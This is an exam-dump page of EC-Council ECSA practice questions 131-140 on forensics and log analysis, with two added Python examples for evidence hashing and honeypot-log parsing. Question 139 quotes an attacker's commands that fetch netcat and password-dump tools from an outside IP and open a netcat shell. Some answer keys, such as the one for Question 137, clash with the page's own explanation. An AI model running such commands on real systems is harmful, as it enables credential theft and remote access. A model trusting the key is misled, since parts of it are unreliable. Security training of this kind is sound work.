[Free] 2017(Sep) EnsurePass Testinsides ECCouncil 412-79 Dumps with VCE and PDF 131-140

September 22, 2017


EC-Council Certified Security Analyst (ECSA)

Question No: 131 – (Topic 3)

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

  A. evidence must be handled in the same way regardless of the type of case

  B. evidence procedures are not important unless you work for a law enforcement agency

  C. evidence in a criminal case must be secured more tightly than in a civil case

  D. evidence in a civil case must be secured more tightly than in a criminal case

Answer: C

Question No: 132 – (Topic 3)

You are assigned to work in the computer forensics lab of a state police agency. While working on a high-profile criminal case, you have followed every applicable procedure; however, your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?

  A. make an MD5 hash of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

  B. make an MD5 hash of the evidence and compare it to the standard database developed by NIST

  C. there is no reason to worry about this possible claim because state labs are certified

  D. sign a statement attesting that the evidence is the same as it was when it entered the lab

Answer: A
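The check behind the answer to Question 132, as an added Python example that is not part of the exam material: hash the evidence on intake, store the digests in the custody record, and re-hash whenever the integrity of the item is challenged. The evidence identifiers and examiner name are made up, and the "disk image" is a few constructed bytes written to a temporary file. MD5 is what the question names; the example records SHA-256 alongside it, because MD5 collisions are practical and a lab should not rest an integrity claim on MD5 alone.

```python
"""Evidence integrity: hash at intake, re-hash later, compare.

Added example for Question 132; not from the exam page. The question names
MD5; SHA-256 is recorded alongside it because MD5 collisions are practical.
"""
import hashlib
import io
import os
import tempfile
from datetime import datetime, timezone

ALGORITHMS = ("md5", "sha256")


def hash_stream(fh, algorithms=ALGORITHMS, chunk_size=1 << 20):
    """Return {algorithm: hexdigest}, reading in chunks so a disk image never sits in memory."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    for chunk in iter(lambda: fh.read(chunk_size), b""):
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data, algorithms=ALGORITHMS):
    return hash_stream(io.BytesIO(data), algorithms)


def hash_file(path, algorithms=ALGORITHMS):
    with open(path, "rb") as fh:
        return hash_stream(fh, algorithms)


def intake_record(path, evidence_id, examiner):
    """Chain-of-custody intake record: who received what, when, and its hashes."""
    return {
        "evidence_id": evidence_id,
        "examiner": examiner,
        "received_utc": datetime.now(timezone.utc).isoformat(),
        "size_bytes": os.path.getsize(path),
        "hashes": hash_file(path),
    }


def verify_against_record(path, record):
    """Re-hash with every algorithm in the record; return (unchanged, {algorithm: (expected, actual)})."""
    expected = record["hashes"]
    actual = hash_file(path, tuple(expected))
    mismatches = {a: (expected[a], actual[a]) for a in expected if expected[a] != actual[a]}
    return (not mismatches, mismatches)


def demo():
    """Constructed image: verify clean, alter one byte, verify again."""
    with tempfile.TemporaryDirectory() as workdir:
        image = os.path.join(workdir, "evidence.dd")
        with open(image, "wb") as fh:  # constructed content, not a real image
            fh.write(b"\x00" * 4096 + b"CASE-FILE-CONTENT" + b"\xff" * 4096)
        record = intake_record(image, "2017-0422-001", "examiner-1")  # hypothetical identifiers
        ok_before, _ = verify_against_record(image, record)
        with open(image, "r+b") as fh:  # simulate alteration while in the lab
            fh.seek(4100)
            fh.write(b"X")
        ok_after, diffs = verify_against_record(image, record)
        return ok_before, ok_after, sorted(diffs)


if __name__ == "__main__":
    print(demo())
```

The intake record, not the examiner's memory, is what you hand the defense: the digests were computed before anyone in the lab touched the item, so a matching re-hash proves the bits are unchanged and a mismatch tells you exactly which item needs explaining. Keep the record itself on write-once or signed storage; a hash that can be rewritten proves nothing.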

Question No: 133 – (Topic 3)

Study the log given below and answer the following question:

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

Precautionary measures to prevent this attack would include writing firewall rules. Which of the following firewall rules would be appropriate?

  A. Disallow UDP53 in from outside to DNS server

  B. Allow UDP53 in from DNS server to outside

  C. Disallow TCP53 in from secondaries or ISP server to DNS server

  D. Block all UDP traffic

Answer: A

Question No: 134 – (Topic 3)

When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place and how events interlace. What is the name of the service used to synchronize time among multiple computers?

  A. Universal Time Set

  B. Network Time Protocol

  C. SyncTime Service

  D. Time-Sync Protocol

Answer: B

Question No: 135 – (Topic 3)

When investigating a potential e-mail crime, what is your first step in the investigation?

  A. Trace the IP address to its origin

  B. Write a report

  C. Determine whether a crime was actually committed

  D. Recover the evidence

Answer: A

Question No: 136 – (Topic 3)

If a suspect computer is located in an area that may have toxic chemicals, you must:

  A. coordinate with the HAZMAT team

  B. determine a way to obtain the suspect computer

  C. assume the suspect machine is contaminated

  D. do not enter alone

Answer: A

Question No: 137 – (Topic 3)

The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of the attack.)

Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558

From the options given below, choose the one which best interprets the following entry:

Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53

  A. An IDS evasion technique

  B. A buffer overflow attempt

  C. A DNS zone transfer

  D. Data being retrieved from 63.226.81.13

Answer: A
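Questions 133 and 137 both turn on reading the same honeypot log, so here is one parser that serves both, added as an example and not part of the exam material. It splits each Snort-style line into timestamp, signature, source and destination, tells the PAM session records apart from IDS alerts, tabulates which outside hosts hit which inbound port (the starting point for the firewall-rule question), and maps each signature name to what that rule fires on. The log lines are the ones printed in the questions with the mangled arrow restored to `->`; the signature-meaning table is the editor's own summary of those Snort rule names, not text from the page.

```python
"""Parse and interpret the honeypot log shared by Questions 133 and 137.

Added example, not from the exam page. Log lines are the ones the questions
print; the MEANING table is the editor's summary of what each Snort rule
family fires on.
"""
import ipaddress
import re
from collections import defaultdict

LOG = """\
Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169
Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0)
Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506)
Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
"""

TS = r"(?P<ts>[A-Z][a-z]{2} \d{2} \d{2}:\d{2}:\d{2})"
# "<sig>: <src>:<sport> -> <dst>:<dport>"; the signature may contain spaces but never a colon.
SIG_RE = re.compile(TS + r" \[\d+\]: (?P<sig>[^:]+): (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$")
SCAN_RE = re.compile(TS + r" \[\d+\]: spp_portscan: portscan detected from (?P<src>[\d.]+)$", re.IGNORECASE)
PAM_RE = re.compile(TS + r" (?P<host>\S+) PAM_pwdb\[\d+\]: \((?P<svc>\w+)\) session opened for user (?P<user>\w+) by (?P<by>.+)$")

# Editor's summary of what each rule family in this log fires on (not from the page).
MEANING = {
    "nops-x86": "run of x86 NOP (0x90) bytes, the sled that pads exploit shellcode",
    "dns-zone-transfer": "AXFR request: attempt to copy the whole zone",
    "DNS-version-query": "version.bind lookup: recon of the DNS daemon version",
    "ftp-passwd-retrieval": "attempt to fetch /etc/passwd over FTP",
    "RPC-rpcinfo-query": "portmapper enumeration of RPC services",
    "web-cgi-space-wildcard": "CGI probe against the web server",
    "socks-probe": "scan for an open SOCKS proxy",
    "telnet-login-incorrect": "failed telnet login",
    "FIN Scan": "stealth port scan using FIN packets",
}


def parse(log_text):
    """One dict per line; kind is 'ids', 'portscan', 'session' or 'unparsed'."""
    events = []
    for line in log_text.splitlines():
        if (m := SIG_RE.match(line)):
            e = m.groupdict()
            e.update(kind="ids", sport=int(e["sport"]), dport=int(e["dport"]))
        elif (m := SCAN_RE.match(line)):
            e = dict(m.groupdict(), kind="portscan")
        elif (m := PAM_RE.match(line)):
            e = dict(m.groupdict(), kind="session")
        else:
            e = {"kind": "unparsed", "raw": line}
        events.append(e)
    return events


def interpret(sig):
    """Map a signature such as 'IDS181/nops-x86' to what it fires on."""
    return MEANING.get(sig.split("/", 1)[-1], "unknown signature " + sig)


def is_internal(ip):
    return ipaddress.ip_address(ip).is_private


def external_sources_by_dport(events):
    """Outside hosts per inbound port: the table a firewall-rule review starts from."""
    table = defaultdict(set)
    for e in events:
        if e["kind"] == "ids" and not is_internal(e["src"]) and is_internal(e["dst"]):
            table[e["dport"]].add(e["src"])
    return dict(table)


def successful_sessions(events):
    """PAM session-open records: the only evidence in this log that an intrusion succeeded."""
    return [(e["ts"], e["svc"], e["user"], e["by"]) for e in events if e["kind"] == "session"]


if __name__ == "__main__":
    evs = parse(LOG)
    for port, srcs in sorted(external_sources_by_dport(evs).items()):
        print(f"port {port}: {sorted(srcs)}")
    for e in evs:
        if e["kind"] == "ids":
            print(f'{e["ts"]} {e["sig"]:32} {interpret(e["sig"])}')
    print(successful_sessions(evs))
```

Two things the parser makes visible that the raw text hides. First, three different outside hosts hit port 53 on both 172.16.1.107 and 172.16.1.101, and the only exploit-looking alert (the NOP run) goes to 53 as well, which is why the DNS-facing rule is the relevant one in Question 133; note that dropping inbound UDP/53 from the outside is only viable if those hosts are not authoritative for a zone served to the Internet, otherwise you restrict version queries and confine zone transfers (TCP/53) to known secondaries instead. Second, the PAM lines are the one place the log shows success: a login as `simple` granted by uid 0 at 06:44:25, then an `su` to `simon`, 80 seconds after the NOP alert from 63.226.81.13.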

Question No: 138 – (Topic 3)

What happens when a file is deleted by a Microsoft operating system using the FAT file system?

  A. only the reference to the file is removed from the FAT

  B. the file is erased and cannot be recovered

  C. a copy of the file is stored and the original file is erased

  D. the file is erased but can be recovered

Answer: A

Question No: 139 – (Topic 3)

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

  A. It is a local exploit where the attacker logs in using username johna2k

  B. There are two attackers on the system -johna2k and haxedj00

  C. The attack is a remote exploit and the hacker downloads three files

  D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Answer: C

Question No: 140 – (Topic 3)

When reviewing web logs, you see an entry for "resource not found" in the HTTP status code field. What is the actual error code that you would see in the log for resource not found?

A. 202

B. 404

C. 505

D. 909

Answer: B
